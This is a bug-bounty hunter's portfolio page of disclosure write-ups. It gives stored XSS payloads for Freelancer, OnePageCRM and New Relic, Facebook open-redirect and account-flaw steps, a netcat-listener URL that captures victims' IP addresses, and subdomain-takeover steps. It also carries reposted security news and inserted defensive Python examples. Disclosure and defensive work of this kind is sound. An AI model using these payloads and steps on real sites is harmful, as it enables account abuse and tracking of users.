ABOUT ME

My First Strategy is committed to providing you the best service.

MY SKILLS

I pride myself on strong, flexible and top-notch skills.

Pentesting

XSS 85%
Broken Authentications 80%
Server-Side Vulnerabilities 70%

Web Developing

PHP 90%
HTML 85%
CSS/JavaScript 80%

Web Designing

Friendly User Interface 90%
SEO 80%
Responsive Page Design 85%

STRATEGY & CREATIVITY

I work with full attention so that I succeed in every job.

Pentesting Blog

I pride myself on bringing fresh exploits and effective vulnerabilities.

  • Stored XSS in Freelancer

    Hello guys. Hope you are doing well. Today I am disclosing my recent finding on Bugcrowd. I just found a stored XSS vulnerability in the main domain of Freelancer, i.e.,
    http://www.freelancer.com/

    I just reported it and got nice Freelancer swag and some kudos. I am also expecting a reward from them, but anyway.

    So, let's move on to the PoC of my submission.

    POC:-

    1. Login
    2. Go to the Profile and Click Edit
    3. In the Bio section add the simple XSS payload, i.e.,
    4.    "><script>alert(1);</script>
    5. Click Save
    6. Open Profile in New Tab
    7. XSS ! BOOM 


    Report Summary:-

    Submission created
    2017-03-30 13:31:50 UTC

    State changed
    2017-03-31 06:29:04 UTC
    Freelancer Engineer changed state to resolved

    Freelancer Engineer Rewarded You With Swag 

    Thanks,
    Abdulwahab
  • Facebook Bugs | By Hacker Wahab


    Aslam-O-Alaikum (Hello) guys. This post contains all the bugs I have found in Facebook.

    1. Open Redirect & Content Spoofing

    Vulnerability Type
    Open Redirector
    Vulnerability Scope
    Mobile Site or App
    Title
    Open Redirect & Content Spoofing
    Description and Impact
    Hi,

    After getting a lot of low-impact issues, I came back with an open redirector issue.
    Reproduction Instructions/Proof of Concept
    In the reporting section of Facebook all the sensitive options are disclosed in the URL:-
    https://mbasic.facebook.com/nfx/basic/question/?context_str=%7B%22initial_action_name%22%3A%22REPORT_CONTENT%22%2C%22breadcrumbs%22%3A%5B%22offensive%22%2C%22hatespeech%22%2C%22religious%22%5D%2C%22story_location%22%3A%22page%22%2C%22is_from_feed_tombstone%22%3Afalse%2C%22actions_taken%22%3A%22%22%2C%22is_rapid_reporting%22%3Afalse%2C%22reportable_ent_token%22%3A%222237869389770846%22%2C%22is_impostor%22%3A%22%22%7D&redirect_uri=http%3A%2F%2Fwww.hackerwahab.com%2F&prev_action_info=%7B%22action_name%22%3A%22UNSUBSCRIBE%22%2C%22completed_title%22%3A%22Posts+from+%5Cu200e%5Cu0645%5Cu0648%5Cu0644%5Cu0648%5Cu06cc+%5Cu0628%5Cu0631%5Cu0642%5Cu0639%5Cu06c1%5Cu200e+hidden%22%2C%22completed_subtitle%22%3A%22Poc+is+of+OPEN+REDIRECT+AND+CONTENT+SPOOFING.%22%7D&av=100015350014851&_rdr

    After redirect_uri= we can add a vuln website, as I did in the above URL, and after completed_subtitle you can add content spoofing text.

    As we are interested in the open redirect, click Done. Then in the survey they ask for community stars; give them, then click Next, then click Submit, and a new page opens with the vulnerable URL.
    Video PoC:-
    https://youtu.be/oFTKN7WWvQs
    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    2. Delete Primary Email (Which is Unallowed by Facebook)

    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Mobile Site or App
    Title
    Delete Primary Email (Which is Unallowed by Facebook)
    Description and Impact
    Hi,
    I am Abdulwahab.

    As you know, there is no way to delete a primary email, but I found an indirect way to delete a primary email.
    Reproduction Instructions/Proof of Concept
    As you can see in {POC 1.png}, there is no way to delete the primary email. On the mobile site there is also no way.
    We can use this URL:-
    https://m.facebook.com/settings/email/?remove_email&email{Primary email Goes here}&refid=74

    to remove the primary email.
    When you open the link, the account's primary email is deleted, as in (POC 2.png).
    As I cannot upload video here, I use YouTube.
    Video PoC( Prv8 ):-
    https://youtu.be/BUG1PLnCJjw
    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    3. Change Account Password Without Knowing Current Password


    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Main Site (www.facebook.com)
    Title
    Change Account Password Without Knowing Current Password
    Description and Impact
    Hi,
    My name is ABDULWAHAB. I am writing this to you because I think I can change the password of a logged-in Facebook account without knowing the current password.
    Reproduction Instructions/Proof of Concept
    1. Go to Settings
    2. On Mobile, add a mobile number you have access to (enter your mobile number)
    3. Log out
    4. Click Forget Password
    5. Enter the mobile number you recently added.
    6. You receive a code; enter it
    7. Enter the new password and DONE!

    As you see, in the whole procedure I don't use the current password, and the account password is changed.

    Fix Suggestion:-
    Ask for the current password when adding a new phone number

    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    4. IP Steal Using Content Injection

    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Mobile Site or App
    Title
    IP Steal Using Content Injection
    Description and Impact
    Hi.

    I found a content injection issue on the mobile site of Facebook. But it has low impact, so I tried to increase the risk of the vulnerability, and I found a serious problem: IP steal.
    Reproduction Instructions/Proof of Concept
    1. Open a Kali Linux terminal
    2. Command to listen on a port:
    nc -lvnp 1337 (you can use any port)
    3. Log in to the Facebook account
    4. Use this port with your IP in this way:-
    https://m.facebook.com/deactivate/incentives/?carrier_name=HACKED BY ABDULWAHAB&carrier_logo_src=http://192.168.1.16:1337/&free_days=25555
    5. When the user opens this page, the IP is captured.
    Video Poc:-
    https://youtu.be/g2naYvWm4j0
    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    5. Content Spoofing

    Vulnerability Type
    Other Vulnerability
    Vulnerability Scope
    Mobile Site or App
    Title
    Content Injection
    Reproduction Instructions/Proof of Concept
    1. Go to Deactivate account
    2. Choose any condition
    3. Click Deactivate
    4. Now you see an ad
    5. Customize it by using its URL

    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other
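
An added example (not part of the original reports and not Facebook's code): server-side validation of URL-valued parameters such as the `redirect_uri` and `carrier_logo_src` parameters seen in reports 1 and 4. The allowed-host set and the function names are assumptions for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption for this sketch: the only hosts allowed as redirect or image targets.
ALLOWED_HOSTS = {"mbasic.facebook.com", "m.facebook.com", "www.facebook.com"}
URL_PARAMS = ("redirect_uri", "carrier_logo_src")  # parameter names from the reports

def is_safe_target(value, allowed=ALLOWED_HOSTS):
    """True for a same-site absolute path or an https URL on an allowed host."""
    if value != value.strip() or any(c in value for c in "\\\r\n\t"):
        return False  # browsers treat "\" like "/", so "/\host" would leave the site
    try:
        parts = urlsplit(value)
        port = parts.port
    except ValueError:  # malformed host or port
        return False
    if not parts.scheme and not parts.netloc:
        return value.startswith("/") and not value.startswith("//")
    if parts.scheme != "https" or parts.username or parts.password:
        return False  # rejects http:, javascript:, and "trusted@other-host" forms
    return parts.hostname in allowed and port in (None, 443)

def rejected_params(request_url):
    """Return {parameter: value} for URL-valued parameters that fail validation."""
    query = parse_qs(urlsplit(request_url).query)
    return {p: v for p in URL_PARAMS for v in query.get(p, [])
            if not is_safe_target(v)}

# Requests shortened from the URLs quoted in reports 1 and 4.
SAMPLES = [
    "https://mbasic.facebook.com/nfx/basic/question/"
    "?redirect_uri=http%3A%2F%2Fwww.hackerwahab.com%2F",
    "https://m.facebook.com/deactivate/incentives/"
    "?carrier_logo_src=http://192.168.1.16:1337/&free_days=25555",
    "https://m.facebook.com/deactivate/incentives/?redirect_uri=%2Fsettings",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(rejected_params(url) or "ok")
```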


  • Sub_Domain TakeOver iwantmyname


    Aslam-O-Alaikum,

    Brothers and sisters. Today I am going to disclose my recent findings on Iwantmyname (Bugcrowd).
    According to this issue, I am able to fully take over a subdomain.

    Tool Used:-
    Knockpy (a Python subdomain finder)

    PoC:-
  • I just found a subdomain that was created under the domain iwantmyname.com.
    This subdomain contains the nameservers and DNS record of WP Engine, but it is not linked with any WP Engine account.
  • Replication Steps
    1. Go to Wpengine.com
    2. Buy a membership
    3. Add domain
    http://an.iwantmyname.com/
    4. Done
    The subdomain now belongs to the attacker.

  • Reward : Kudos
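
An added example, not from the original post: an offline audit that flags DNS names pointing at a hosting provider where no matching site is claimed, which is the condition described above. The zone records, the `wpengine.com` CNAME suffix and the claimed-domain inventory are constructed assumptions.

```python
# Assumed provider fingerprint: CNAME targets under this suffix are WP Engine sites.
PROVIDER_SUFFIXES = {"wpengine.com": "WP Engine"}

# Constructed zone export: (hostname, record type, target).
ZONE = [
    ("www.example.com", "A", "203.0.113.10"),
    ("blog.example.com", "CNAME", "blogprod.wpengine.com."),
    ("an.example.com", "CNAME", "legacy.example.com."),
    ("legacy.example.com", "CNAME", "oldsite.wpengine.com."),
    ("shop.example.com", "CNAME", "stores.example.net."),
]
# Constructed inventory: hostnames actually added to our account at each provider.
CLAIMED = {"WP Engine": {"blog.example.com"}}

def norm(name):
    return name.rstrip(".").lower()

def provider_for(target):
    """Name of the third-party provider a CNAME target belongs to, or None."""
    for suffix, provider in PROVIDER_SUFFIXES.items():
        if target == suffix or target.endswith("." + suffix):
            return provider
    return None

def dangling_records(zone, claimed):
    """List (host, final_target, provider) where DNS points at a provider
    but the host is not claimed in our account there."""
    cnames = {norm(h): norm(t) for h, rtype, t in zone if rtype == "CNAME"}
    findings = []
    for host in sorted(cnames):
        target, seen = cnames[host], {host}
        while target in cnames and target not in seen:  # follow in-zone chains
            seen.add(target)
            target = cnames[target]
        provider = provider_for(target)
        if provider and host not in claimed.get(provider, set()):
            findings.append((host, target, provider))
    return findings

if __name__ == "__main__":
    for host, target, provider in dangling_records(ZONE, CLAIMED):
        print(f"UNCLAIMED {host} -> {target} ({provider}): remove record or claim it")
```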

  • President Donald Trump's Website Hacked; Defaced By Iraqi Hacker

    During the 2016 presidential election campaign, we reported about how insecure the mail servers operated by the Trump organization were, such that anyone with little knowledge of computers could expose almost everything about Trump and his campaign.

    Now, some unknown hackers calling themselves "Pro_Mast3r" managed to deface an official website associated with President Donald Trump's presidential campaign fundraising on Sunday.

    The hacker, claiming to be from Iraq, reportedly defaced the server, secure2.donaldjtrump.com, which is behind CloudFlare's content management system and security platform.

    The server appears to be an official Trump campaign server, reported Ars, as the certificate of the server is legitimate, "but a reference to an image on another site is insecure, prompting a warning on Chrome and Firefox that the connection is not secure."

    The defaced website displayed an image of a black hat man and included a text message, which reads:
    Hacked by Pro_Mast3r ~
    Attacker Gov
    Nothing Is Impossible
    Peace From Iraq

    Instead, the server includes a link to javascript on a now-nonexistent Google Code account, 'masterendi,' which was linked to cyber attacks on three other sites in the past.

  • A Simple JavaScript Exploit Bypasses ASLR Protection On 22 CPU Architectures




    Here's How the attack works:

    The attack exploits the way microprocessors and memory interact with each other.

    The MMU, which is present in desktop, mobile and server chips and is tasked with mapping where a computer stores programs in its memory, constantly checks a directory called a page table to keep track of those addresses.

    Devices usually store the page table in the CPU’s cache which makes the chip speedier and more efficient. But this component also shares some of its cache with untrusted applications, including browsers.
    Therefore, a piece of javascript code running on a malicious website can also write to that cache (side channel attack), allowing attackers to discover where software components, like libraries and RAM-mapped files, are located in virtual memory.

    With these location data in hands, any attacker can read portions of the computer's memory, which they could then use to launch more complex exploits, escalate access to the complete operating system, and hijack a computer system.

    The researchers successfully exploited AnC JavaScript attacks via up-to-date Chrome and Firefox web browsers on 22 different CPU micro-architectures in about 90 seconds, even despite ASLR protections built within those browsers, like broken JavaScript timers.

    The VUSec research team has published two research papers [1, 2] detailing the AnC attack, along with two video demonstrations showing the attack running in a Firefox browser on a 64-bit Linux machine.
    In their attack, the researchers combined their AnC JavaScript with attack code that exploits a now-patched use-after-free vulnerability (CVE-2013-0753) in Firefox. Issues with AnC attacks are tracked through several CVE identifiers, including:
    • CVE-2017-5925 for Intel processors
    • CVE-2017-5926 for AMD processors
    • CVE-2017-5927 for ARM processors
    • CVE-2017-5928 for a timing issue affecting multiple browsers
    The VUSec team already notified all the affected chipmakers and software firms, including Intel, AMD, Samsung, Nvidia, Microsoft, Apple, Google, and Mozilla, more than three months ago, but only now went public with their findings.
    "The conclusion is that such caching behavior and strong address space randomization are mutually exclusive," the paper concludes. "Because of the importance of the caching hierarchy for the overall system performance, all fixes are likely to be too costly to be practical." 
    "Moreover, even if mitigations are possible in hardware, such as separate cache for page tables, the problems may well resurface in software. We hence recommend ASLR to no longer be trusted as the first line of defense against memory error attacks and for future defenses not to rely on it as a pivotal building block."
    According to the team, the only way you can protect yourself against AnC attacks is to enable plug-ins, such as NoScript for Firefox or ScriptSafe for Chrome, to block untrusted JavaScript code on web pages from running in the browser.

    CopyRight: The Hacker News
  • Stored XSS in OnePageCRM


    Aslam-O-Alaikum,

    Friends, hope you are all fine. Today I am going to share the PoC of a stored XSS I recently found in OnePageCRM.

    OnePageCRM:

    OnePageCRM is a simple online sales CRM for small business. Focus on your Next Action to easily convert leads into customers and grow your business.

    Summary of Report
  • Submitted: 2016-11-20 15:33:41 UTC
  • State changed to resolved: 2016-11-29 13:00:26 UTC
  • While testing OnePageCRM I observed that the signup field (Address field) is vulnerable to XSS, so I tried that and it popped up, to my happiness.

    1. Sign up with Contact Name in Address Field below:-
    <script>alert(1);</script>
    2. Log in with the account
    3. XSS executed

    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,


  • Stored XSS in New Relic

    About New_Relic:-

    Offers a performance management solution enabling developers to diagnose and fix application performance problems in real time.


     Here is The PoC:-



    Hello, I am ABDULWAHAB.
    Today I found a stored XSS in rpm.newrelic.com
    1. Open Newrelic.com
    2. Register a new account, but in Company add the XSS code <script>alert('XSS BY ABDULWAHAB');</script>
    3. Complete signup
    4. XSS code executed
    Watch the video below
    Thanks,
    ABDULWAHAB
    Tested On:-
    OS: Windows 8.1
    Browser: Chrome
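
An added example, not code from the original posts or from the affected sites: the payloads quoted in the Freelancer and New Relic posts rendered with and without output encoding (the OnePageCRM address field is the same case), plus a parser-based check that can serve as a regression test. The template and the field names are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed stored record; the two values are the payloads quoted in the posts.
PROFILE = {
    "bio": '"><script>alert(1);</script>',
    "company": "<script>alert('XSS BY ABDULWAHAB');</script>",
}

def render_unsafe(p):
    # Vulnerable pattern: stored values concatenated straight into markup.
    return ('<input name="bio" value="' + p["bio"] + '">'
            '<h2>' + p["company"] + '</h2>')

def render_safe(p):
    # Encode at output time; quote=True also encodes " and ' so the value
    # cannot close the attribute it is placed in.
    bio = html.escape(p["bio"], quote=True)
    company = html.escape(p["company"], quote=True)
    return f'<input name="bio" value="{bio}"><h2>{company}</h2>'

class TagAudit(HTMLParser):
    """Records every element and on* handler attribute found in the markup."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [k for k, _ in attrs if k.startswith("on")]

def audit(markup, allowed=("input", "h2")):
    """Return tags and handlers in the output that the template never wrote."""
    a = TagAudit()
    a.feed(markup)
    a.close()
    return sorted({t for t in a.tags if t not in allowed} | set(a.handlers))

if __name__ == "__main__":
    print("unsafe:", audit(render_unsafe(PROFILE)))
    print("safe:  ", audit(render_safe(PROFILE)))
```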

      CONTACT ME

      For enquiries you can contact me in several different ways. Contact details are below.

      ABDULWAHAB

      • Meet-Up :Lahore,Pakistan
      • Phone :+92 3164970878
      • Country :PAKISTAN
      • Email :hackertabish786@gmail.com